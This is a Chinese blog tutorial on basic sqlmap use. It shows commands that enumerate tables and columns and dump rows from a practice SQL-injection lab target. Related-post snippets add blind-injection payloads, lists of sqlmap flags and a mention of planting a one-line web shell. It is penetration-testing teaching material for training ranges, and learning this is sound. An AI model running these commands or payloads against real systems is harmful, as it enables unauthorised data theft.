sqlmap的简单用法

最新推荐文章于 2022-06-05 15:28:13 发布
最新推荐文章于 2022-06-05 15:28:13 发布
阅读量135 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hx1043116928/article/details/108848719
版权

sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

安装完python,sqlmap以后就可以进行使用

简单使用:

知道库名之后:爆破表名

python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 --dbms MYSQL -D 库名 --tables --level 2

知道库名,表名之后,爆破字段名

python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 --dbms MYSQL -D 库名 -T 表名 --columns --level 2

知道,库名,表名,字段名之后,爆破字段1~3行的内容

python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-11/index.php?id=1 --dbms MYSQL -D 库名-T 表名-C 字段名 --dump --start 1 --stop 3 --level 2

 

Thexin.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3733
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9344
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
sqlmap简单使用方法
西部壮仔的博客
02-07 234
介绍 sqlmap是安全测试工具,通常用于对已知的http接口进行sql注入测试,一旦注入成功,可以获取到后台包括数据库表、用户信息、数据内容等多种敏感信息,对web漏洞防范有重要意义。 使用 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-use...
sqlMap简单使用
weixin_54472394的博客
06-05 578
一、单个、多个 url 查询 1.单个 -u 1.多个 -m feixiang.txt: http.txt: 三 ,http bp日志扫描 使用bp抓包 保持访问过的 http头部文件 -l :log http log 的意思 –level 5 : cookie 等http头部文件查询
猫舍-sql注入
tlucky的博客
04-16 2496
漏洞地址 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 漏洞类型 Sql注入 漏洞描述及危害 sql注入是一种将sql代码插入或添加到应用用户的输入参数中,再将这些参数传递给后台的sql服务器加以解析并执行。Sql注入会导致数据库信息泄露,网页被篡改,数据库被恶意操作,服务器被远程控制和被种植木马等多种危害。 漏洞详情 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 属于数字型注入 ①数据库名 ②表名 http://
封神台靶场writeup
weixin_44155363的博客
06-06 6883
封神台靶场 https://hack.zkaq.cn/battle 还是很有意思的一个靶场 查看源码,找到了字典文件; 用域名爆破工具,放入字典后爆破;答案为:http://8adc3387c2ed6cce.lab.aqlab.cn:81 aqlab.cn 一级域名 lab为二级域名 kali01就是三级域名; https://site.ip138.com/ 这个网站能通过同ip网站能直接查处结果; shop.aqlab.cn:8001 nmap完全扫描可发现,快速扫描无法发现; n
SQLmap简单的使用——新手教程解析
m0_52027565的博客
10-11 2543
SQLmap简单的使用——新手教程解析 你好哇!今天给大家介绍一款白帽子工具。他就是号称"数据库的克星"——SQLmapSQLmap解析学习须知:一、sqlmap的安装与操作?(window与linux)1.windows版2.linux版二、使用步骤1.简单的探测WAF2.初步学习的使用sqlmap命令3.简单的使用tamper脚本绕过WAF补充:宽字节注入: 学习须知: 在21世纪的网络空间中,各大互联网巨头通过各种数据库泄露情报的事件都屡见不鲜。我们如何才能很完美的保护我们的数据不被泄呢?这
SQLMAP简易使用教程
nzw1134864657的博客
10-07 9221
SQLMap 一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL 注入漏洞,内置了很多绕过插件 1.1 SQLMap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同
第六天二次注入sqlmap简单参数
代码审计
03-09 2817
二次注入 今天学习二次注入 二次注入原理 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。 也就是说在应用程序中输入恶意造的数据库查询语句时会被转义,但是在数据库内部调用读取语句的时候又被还原。 二次注入,可以概括为以下两步: 第一
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py web_chinaz 10 web_chinaz 为应用文件名称,10表示要生成的队伍数量 start.py python start.py 10 启动10个实例,以及check和flag服务。 stop_clean.py python stop_clean.py 暂停所有服务,并删除临时文件 注意,这里会删除所有现运行的容器,请谨慎使用。 pass.txt 存储队伍用户名密码,以及ssh、web端口 team01 ctf:308d66 ssh:2201 port:8801 team02 ctf:024b1d ssh:2202 po
SQL注入靶场作业——显错注入RANK1~4
weixin_45540609的博客
04-14 273
RANK1 一、查看是否有SQL漏洞 id=2和id=4-2回显相同内容,说明有SQL注入漏洞 二、猜字段 http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 order by 4 说明只有3个字段 三、查找回显点 2,3字段会显示,所以第2,3字段是回显点 四、系统自带库查找表名,字段名 http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1.22222%20uni
子域名 sublist3r
12-03 944
子域名&目录扫描 一:子域名收集知多少? 二:常见子域盲区 三:子域收集方式(在线,软件) 四:目录扫描(最常见针对网站进行扫描,比如是否存在admin这个目录) 一:子域名收集的作用 1扩大渗透测试的范围 主站防护非常严密,就需要我们找到它的子域站点寻找突破口,找到目标站点的突破口(a.b.com和b.com是两个站点,但是他们可能是在同在一个服务器,我们把a.b.com弄了就可以主站拿...
sqlmap常用指令
a_running_snail_的博客
06-20 1332
Sqlmap笔记 sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库 Web数据库使用的账户 sqlmap -u 注入点 ...
18、SQL盲注
songling515010475的专栏
05-22 237
Boolen盲注就是通过判断数据能不能够回显来判断是否存在盲注,既然是Boolean型盲注哪么从字面意思上就可以知道,返回的值True/False 1.判断是否存在SQL注入 2.尝试获判断库名的长度(这里我己经通过大于小于判断出来了库名长度为12) 3.通过Burp抓包,尝试对库名第一位进行爆破 4.设置从0~127位,每一个都去进行比较 5.通过Response返回结果不一样的,看结果是否正常返回了数据,正常说明条件为True,说明就是这个字符。这里爆破出来的第一个字...
【封神台】漏洞挖掘与代码审计 wp
孤桜懶契
08-15 622
前言 掌控安全里面的靶场漏洞挖掘与代码审计,练练手! 本地包含漏洞审计 环境 :http://wjbh522a.zs.aqlab.cn/ 默认弱密码登陆 admin admin 登陆之后发现是个4.8.1的版本,其实这题做的方法太多了,也可以不用代码审计,网上有一堆payload远程文件包含,不过这个靶场说下源代码审计,那就看看。 下载源码:https://www.phpmyadmin.net/files/4.8.1/ 因为提示说了文件包含,直接全局搜索include 分析
Sqlmap 简单使用
qq_31561731的博客
01-02 1332
使用工具探测出注入点后使用sqlmap注入的简单流程(傻瓜式跟着复制就可以使用): 1.sqlmap -u url --random-agent(这个探测出数据库类型) 2.sqlmap -u url --random-agent --current-db(这个探测出数据库的名字 ) 3.sqlmap -u url --random-agent -D 数据库名 -tables(枚举出数据库中的表) 4.sqlmap -u url --random-agent -D 数据库名 -T 表名 --colum
Sqlmap学习笔记(零)
子曰小玖的博客
05-30 3158
https://blog.werner.wiki/sqlmap-study-notes-0/ 零、前言 这篇文章是我学习Sqlmap用法时做的笔记,记录了Sqlmap的常见、基础用法。 学习的主要方法是阅读官方手册(sqlmap/doc/README.pdf)。 一、Sqlmap是什么 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、O...
sqlmap简单使用
selecthch的博客
06-02 2323
今天学习了sqlmap的使用,自己又在网上查找了一些学习笔记然后就想在本地搭建的环境上测试使用一下sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返...
sqlmap使用教程
最新发布
07-27
例如,使用以下命令指定使用POST方法发送数据,并且在发现注入点后尝试获取数据库中的所有表: ``` sqlmap -u <目标URL> --data=<参数名>=<注入点> --method=POST --tables ``` 6. 更多功能:sqlmap还提供了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值